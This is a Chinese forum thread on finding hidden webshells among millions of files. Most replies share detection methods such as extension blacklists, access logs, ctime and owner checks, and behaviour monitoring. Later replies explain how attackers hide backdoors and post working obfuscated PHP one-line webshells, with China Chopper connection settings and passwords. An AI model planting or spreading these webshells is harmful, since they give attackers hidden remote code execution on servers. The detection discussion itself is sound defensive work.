百万级文件数如何快速查找WebBackDoor?

  这个如果有以前文件的快照的话 那么可以非常快找到 shell 的。

@SinCoder 如果没有呢?

@iucker 我觉的其他办法就是你筛选的话符合要求的文件数量也是巨大的，各种变形神马的直接找应该比较困难，期待大神给出其他的好办法~

关键是排序和排除吧。关键看具体的需求

如果没有保留快照、Hash、时间戳等原始对比信息的话，这个只能遍历了……

判断文件修改时间的方法不可取，因为攻击者极大可能修改了文件时间。

如果遍历的话，高效的处理算法是很关键的。

如果有 Web 访问日志的话，我想，首先可以过滤掉一些 0 访问量的文件，可以大大的减少需要遍历的文件数量，但是有个缺点，如果是图片包含方式的木马，虽然该图片是 0 访问，但是仍被其他脚本加载执行……

不过这个缺点，可以在之后关键词匹配的时候发现出来（判断脚本中所有包含语句，所包含的文件后缀），所以遗漏的几率很小，几乎不会遗漏，凡是遗漏的都是废弃的后门，虽然是图片后缀，但是没有任何一个文件包含，所以也是无法执行的，废弃的，无危害……

总的来说，我可以概括为以下几个步骤：

1、获取文件列表，获取的同时采用【黑名单】过滤掉“.mdb、.html、.css、.js、.txt、.jpg、.gif、.bmp、.mp3、.wav、.mid……”（提示一下，在过滤文件的同时，可以增加一个 if 判断，顺道判断特殊文件名、畸形目录等变形后门，例如：/a.asp/a.jpg、a.asp;a.jpg、a.asp;jpg、aux.asp、com1.asp……，可以直接判定为后门！根本不用再用关键词匹配，省去大量时间……），等非脚本后缀的文件（还可以过滤超大体积的文件），注意：一定是黑名单过滤，如果你使用白名单的话，会遗漏一些特殊路径的文件，例如：a.asp;a.jpg、a.asp;jpg、file（没后缀的）……，经过这个过滤后缀操作，大概可以排除 60% – 70% 以上的非脚本文件，甚至更多（越华丽的网站，图片越多，脚本只占极少数）……

2、如果存在 Web 访问日志的话，如上所述，可以分析一下文件访问频率（可以重点检查访问率高的文件），又可以排除很大一批 0 访问量的文件，这些文件大多数都是一些通用的函数库文件，一般一个网站通用的包含文件很多，而针对前台用户访问的文件只占极少数，这样又可以过滤很大一批文件，起码有 10%，不过这个有个缺陷，首先如果日志很大的话，分析会很消耗时间，而且可能会漏掉一些包含式的后门，这个根据情况使用吧。

3、经过以上的处理，大概只剩下 10% – 20% 的文件需要处理，也就是个 10 万多的文件（Win7 旗舰版安装完后，C 盘大约有 6 多万文件，这实在不算多），挨个读取进行关键词匹配，如果你关键词匹配的算法比较好的话，应该不需要很长时间了。

4、其他过滤算法。

坐等其他大牛更先进的方案……

还可以同时保留这次清理文件的 Hash 值，给以后的清理作参考信息。

再提示一下，可以参考杀毒软件全盘查杀的处理方案……

如果是应用层出的事情，在应用层对抗很麻烦，我们考虑的思路是更底层，与@核攻击 不同，我们经常的环境是linux环境，所以：
1 上传后门往往用户是www，而当时的应用程序的属主是work，甚至mysql创建的后门属主是mysql
2 创建时间，在linux下修改ctime是需要root权限的，所以按照ctime分组能够很快判断出一个后门，后门往往和应用程序诞生时间是不一样的
3 访问行为，后门与普通应用的访问行为来说，最大的不同在于访问频率和ip，正常应用会被很多人来访问，但是后门往往就只对应一个访问用户

推荐80sec那个分析被黑的文章

换个思路之后，文件多少不是真正的问题 ：）

如果应用过多，想防住它是不可能的。所以，在我的系统架构中，做了严格的url访问或文件访问权限校验（当然，都是有利弊共存的，还是要看应用类型），即使留了webbackdoor，攻击者也是无法访问到它！

Good，行为分析很重要！

如果按照杀软的主动防御思路来做的话……

即使他留了后门，行为分析，直接给禁止……

貌似扯远了……

@蟋蟀哥哥 @xsser @shine @核攻击 @pangshenjie @SinCoder
非常感谢各位解答,真是个耗体力的苦B活…..

其实，只要有一个事实运维标准，再结合这个标准做监控（例如版本库svn diff，例如运行用户的属性，例如更新时间的固定性），一切和标准不同的内容都是异常（无论是网络流量、系统属性、文件自身层面），然后再从异常中结合行为特征进行查找会有效减少工作量。建立多层级异常处理机制很重要。

实际还有更好的方法，呵呵，比如说吧，你一个web应用，为毛会有尝试读取web目录以外的文件呢？即使有，这种例外是很容易被枚举出来的吧。

这个我觉得是比较猥琐的检测思路了。但是需要和系统结合，做一些文件系统的监控

恶意代码分析系统 可以自定义字段 可以完善一下那个工具 是找后门 清挂马的神器！

就单讨论恶意脚本的静态特征的话，国外有个开源的脚本来着，最近也一直在找，忘了叫什么了

@xsser 我很赞80sec的那次入侵分析，不慌不躁，找准问题关键所在。

除了剑心说的这两个，我有点想补充，如果在LAMP环境下，就按这方法做，要是win呢，谁说不可能用解析洞？所以，定义文件夹及文件规则，先断了解析漏洞，再查找，小菜回答，大牛勿喷，喷者爆菊花！

换位思考。

我放后门基本都是修改一个放在很深层的脚本文件，添加一段变形的一句话。然后修改时间清理日志。

linux下用touch修改文件的修改时间可以不需要root。
后门文件一定要跟周围的文件所属用户一样都是www或者nobody

大家想想我没做什么？怎么查到？

ctime（看上级目录的）+正则匹配+属性权限+服务的配置文件+过滤日志！

后门这种东西都要放在比较深的目录里，还要变一变代码，我还喜欢改成一些比较像正常文件的名字，比如link.asp之类的……文件修改时间有权限是一定要改的

@f4tb0y 我喜欢建在缓存文件夹下面。~aadsSFDSWR~FSDGDFG.php 然后一顿回车，在最后面添加一段
First:1.php

<?php ($_=@$_GET[2]).@$_($_POST[1])?>

菜刀里写：http://localhost/1.php?2=assert
密码:1

Second:2.php

<?php
$_=””;
$_[+""]=”;
$_=”$_”.””;
$_=($_[+""]|””).($_[+""]|””).($_[+""]^””);
?>
<?php ${‘_’.$_}['_'](${‘_’.$_}['__']);?>

菜刀里写：http://localhost/2.php?_=assert&__=eval($_POST['pass'])
密码：pass

@坏虾 LS 给力啊！又学到知识了~ 我很少搞变形的一句话 thx

@坏虾 感谢，变种厉害！

@坏虾  给力！

@HuGtion @小胖子 @f4tb0y  
我发的这些都是网上公开的了，想让人发现不了，就自己整点有意思的。

我现在喜欢用这个
<?php

@preg_replace(“/[email]/e”,$_POST['h'],”error”);

?>

菜刀附加数据：
<O>h=@eval($_POST);</O>

密码 c  
不过仔细查下preg_replace，还是会被发现。  一样，都是已经被公开的了。

文件多的话，分析行为快速些，建个黑盒环境文件拖进去，一些常见服务器漏洞伪造成蜜罐类似，追踪这些重要的访问记录。

@GaRY 讲的靠谱。有没有更具体点的实现方法？

@xsser 我今天发现一个问题，ctime一致，但肯定是apache创建的……真有人用了root改ctime，而不改属主？还是用别的方式改的？

==============
-[隐藏] 1 root   root     777 Mar 30  2011 a_normal.class.php
-[隐藏] 1 daemon daemon 91877 Mar 30  2011 a_normal.clas.php   //木马
==============